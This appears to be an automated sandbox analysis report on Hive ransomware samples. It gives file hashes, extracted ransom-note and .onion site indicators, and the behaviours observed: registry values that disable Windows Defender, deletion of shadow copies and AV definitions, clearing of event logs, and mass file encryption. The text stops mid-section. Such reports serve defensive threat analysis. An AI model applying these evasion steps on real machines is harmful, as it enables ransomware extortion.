Overview
overview
10Static
static
7Ransomware.Hive.zip
windows7-x64
1Ransomware.Hive.zip
windows10-1703-x64
1211xahcou.exe
windows7-x64
10211xahcou.exe
windows10-1703-x64
10Hive.elf
windows7-x64
3Hive.elf
windows10-1703-x64
3hive.exe
windows7-x64
10hive.exe
windows10-1703-x64
10hive_linux_elf
windows7-x64
1hive_linux_elf
windows10-1703-x64
1linux_hive.elf
windows7-x64
3linux_hive.elf
windows10-1703-x64
3sjl8j6ap3.exe
windows7-x64
1sjl8j6ap3.exe
windows10-1703-x64
1windows_25...c5.exe
windows7-x64
10windows_25...c5.exe
windows10-1703-x64
10zi1ysv64h.exe
windows7-x64
10zi1ysv64h.exe
windows10-1703-x64
10Analysis
-
max time kernel
330s -
max time network
332s -
platform
windows10-1703_x64 -
resource
win10-20231215-en -
resource tags
arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system -
submitted
12-02-2024 06:38
Behavioral task
behavioral1
Sample
Ransomware.Hive.zip
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
Ransomware.Hive.zip
Resource
win10-20231215-en
Behavioral task
behavioral3
Sample
211xahcou.exe
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
211xahcou.exe
Resource
win10-20231215-en
Behavioral task
behavioral5
Sample
Hive.elf
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
Hive.elf
Resource
win10-20231215-en
Behavioral task
behavioral7
Sample
hive.exe
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
hive.exe
Resource
win10-20231215-en
Behavioral task
behavioral9
Sample
hive_linux_elf
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
hive_linux_elf
Resource
win10-20231215-en
Behavioral task
behavioral11
Sample
linux_hive.elf
Resource
win7-20231215-en
Behavioral task
behavioral12
Sample
linux_hive.elf
Resource
win10-20231215-en
Behavioral task
behavioral13
Sample
sjl8j6ap3.exe
Resource
win7-20231215-en
Behavioral task
behavioral14
Sample
sjl8j6ap3.exe
Resource
win10-20231215-en
Behavioral task
behavioral15
Sample
windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
Resource
win7-20231215-en
Behavioral task
behavioral16
Sample
windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
Resource
win10-20231215-en
Behavioral task
behavioral17
Sample
zi1ysv64h.exe
Resource
win7-20231215-en
General
-
Target
windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
-
Size
884KB
-
MD5
da13022097518d123a91a3958be326da
-
SHA1
24a71ab462594d5a159bbf176588af951aba1381
-
SHA256
25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5
-
SHA512
a82aa97a92cd21ee2d4b556448fd3293396eb7c01d3626ebdb6c3816277783578686830c430014b6b2fc3280bc1301df27da079937f88834c2d35641eb5fc26f
-
SSDEEP
12288:Sw41dVZvThPCsM18GLHe7wlDdkPAQEtxr0fflvRmhEBWtdUJiAUtP/T/kAfMvgVt:dod1HDmlDdkZ4YXPpaTTXMw
Malware Config
Extracted
C:\Program Files\Common Files\DESIGNER\EGdu_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 64 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
description ioc Process Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
pid Process 1508 wevtutil.exe 4856 wevtutil.exe 4700 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral16/memory/3884-0-0x0000000001230000-0x0000000001542000-memory.dmp upx behavioral16/memory/3884-1-0x0000000001230000-0x0000000001542000-memory.dmp upx behavioral16/memory/3884-2-0x0000000001230000-0x0000000001542000-memory.dmp upx behavioral16/memory/3884-263-0x0000000001230000-0x0000000001542000-memory.dmp upx behavioral16/memory/3884-2728-0x0000000001230000-0x0000000001542000-memory.dmp upx behavioral16/memory/3884-3879-0x0000000001230000-0x0000000001542000-memory.dmp upx behavioral16/memory/3884-6383-0x0000000001230000-0x0000000001542000-memory.dmp upx behavioral16/memory/3884-6933-0x0000000001230000-0x0000000001542000-memory.dmp upx behavioral16/memory/3884-8110-0x0000000001230000-0x0000000001542000-memory.dmp upx behavioral16/memory/3884-8113-0x0000000001230000-0x0000000001542000-memory.dmp upx behavioral16/memory/3884-8116-0x0000000001230000-0x0000000001542000-memory.dmp upx behavioral16/memory/3884-8121-0x0000000001230000-0x0000000001542000-memory.dmp upx behavioral16/memory/3884-8125-0x0000000001230000-0x0000000001542000-memory.dmp upx behavioral16/memory/3884-8130-0x0000000001230000-0x0000000001542000-memory.dmp upx behavioral16/memory/3884-8134-0x0000000001230000-0x0000000001542000-memory.dmp upx behavioral16/memory/3884-8138-0x0000000001230000-0x0000000001542000-memory.dmp upx behavioral16/memory/3884-8143-0x0000000001230000-0x0000000001542000-memory.dmp upx behavioral16/memory/3884-8147-0x0000000001230000-0x0000000001542000-memory.dmp upx behavioral16/memory/3884-8152-0x0000000001230000-0x0000000001542000-memory.dmp upx behavioral16/memory/3884-8156-0x0000000001230000-0x0000000001542000-memory.dmp upx behavioral16/memory/3884-8161-0x0000000001230000-0x0000000001542000-memory.dmp upx behavioral16/memory/3884-8205-0x0000000001230000-0x0000000001542000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Office\root\vreg\powerpoint.x-none.msi.16.x-none.vreg.dat.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXqHKs0pfx7pBUjNmqVL0s9c.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\SplashScreen.scale-200.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\StoreBadgeLogo.scale-200.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\pt-br\ui-strings.js.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXrwTUiZFRiHO0VRcVxLVfZA.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubSplashSquareTile.scale-125.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Work\SmallTile.scale-200.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SplashScreen.scale-100_contrast-black.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\ja-JP\mshwLatin.dll.mui.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXq9_o47TgJ5O7ZoMH3W6OcS.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\it-IT\TipRes.dll.mui windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\as80.xsl.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXqC__z2qkFmXhkgL8G3Lb4j.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.OneConnect_2.1701.277.0_x64__8wekyb3d8bbwe\Assets\contrast-white\OneConnectAppList.targetsize-64.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-80.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\XboxApp.UI\Resources\Images\star_empty.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_neutral_split.scale-100_kzf8qxf38zg5c\SkypeApp\Assets\SkypeLogo.scale-100.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_neutral_split.scale-100_8wekyb3d8bbwe\Lumia.ViewerPlugin\Assets\IconOpenInCinemagraph.scale-100.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Images\PrintAndShare\Glyph_0xe7d1.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\OutlookMailBadge.scale-400.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\models\it-IT.PhoneNumber.ot windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\example_icons2x.png.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXpJVubJmeNQWFiseKJVdsQI.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ms_get.svg.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXpYiqa4QcYTFB307Rtqea9I.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sv-se\EGdu_HOW_TO_DECRYPT.txt windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fr-fr\ui-strings.js.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXom84mdX-qfK_QZUKSni7kj.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner.png.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXrM011-nPN_UOeMrm_ZPgB5.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\da-dk\EGdu_HOW_TO_DECRYPT.txt windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11701.1001.87.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\SplashScreen.scale-125.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\manifestAssets\contrast-black\StoreLogo.scale-100.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-40_altform-unplated_contrast-black.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-30_altform-unplated_contrast-white.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\vlc.mo.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXqNRRKCCka3GV9lrVDOin9B.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-256_altform-unplated_contrast-white.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\root\EGdu_HOW_TO_DECRYPT.txt windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxA-Yahoo-Dark.scale-250.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\models\es-ES.PhoneNumber.ot windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_empty_state.svg.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXqa_mPPq65wSnkJFyDU20k3.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ro-ro\EGdu_HOW_TO_DECRYPT.txt windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\lcms.md.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXq4moc8W1j1H4Fr9OoCadAY.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OutlookR_Trial-pl.xrm-ms.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXp5msI6D8vBaYpwe4nozx8l.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\ExchangeSmallTile.scale-125.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\ZY______.PFB.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXorUvhmVXDrMEA7fi5FsgU9.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\cs-cz\EGdu_HOW_TO_DECRYPT.txt windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\home-view\EGdu_HOW_TO_DECRYPT.txt windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\StepExpand.svgz.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXphcFhLLaCVWfiiEh6ubAwg.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\Assets\Office\PlaneCutKeepBottom.scale-180.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\ThirdPartyNotices_Arkadium.txt windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_ja_135x40.svg.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXqSyrtvJ8ekI2NCf2TreoYF.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\de-de\ui-strings.js.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXoJ7uz-dgRGJvq6kG3gi-Ug.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Common Files\System\msadc\fr-FR\msadcer.dll.mui.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXrhcErNIqwGJ-2F9bCtOfs6.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\LEELAWAD.TTF.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXqi3kvBKn2ueYISuWLovotT.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\TimerSmallTile.scale-200.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GamesXboxHubBadgeLogo.scale-200_contrast-high.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.DailyChallenges\Assets\Tab\TabComing.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\TimerSmallTile.contrast-white_scale-100.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CASCADE\CASCADE.ELM.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXqLxl2G2z5zbXCD86ta468v.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Content\images\en-US\windows-main-08294e1b-0ad7-4937-9616-fcbc42ff7ff1.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe\images\OfficeHubLogo_71x71.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Awards\common\Flipping_Out_Unearned_small.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial4-ul-oob.xrm-ms.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXqbauPNS3ADJ2s2uGvq0hpc.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL075.XML.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXoFv9bJg3DVN87GDPckIgwh.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ko-kr\ui-strings.js.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXp0kgUJyIXTaJhE1Lnx6-wG.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXpAXb7JKT3KAFz3VgXXkMtR.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\contrast-white\LargeLogo.scale-100_contrast-white.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\6584_32x32x32.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SUMIPNTG\PREVIEW.GIF.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXq0tV633niGCcBrI68KoJs7.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Windows Defender\es-ES\shellext.dll.mui windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe -
Launches sc.exe 9 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 428 sc.exe 1576 sc.exe 4140 sc.exe 1396 sc.exe 2724 sc.exe 932 sc.exe 3324 sc.exe 3900 sc.exe 5108 sc.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 764 vssadmin.exe -
Modifies registry class 3 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP Conhost.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 348 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4576 PING.EXE -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 1516 powershell.exe 1516 powershell.exe 1516 powershell.exe 4208 powershell.exe 4208 powershell.exe 4208 powershell.exe 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
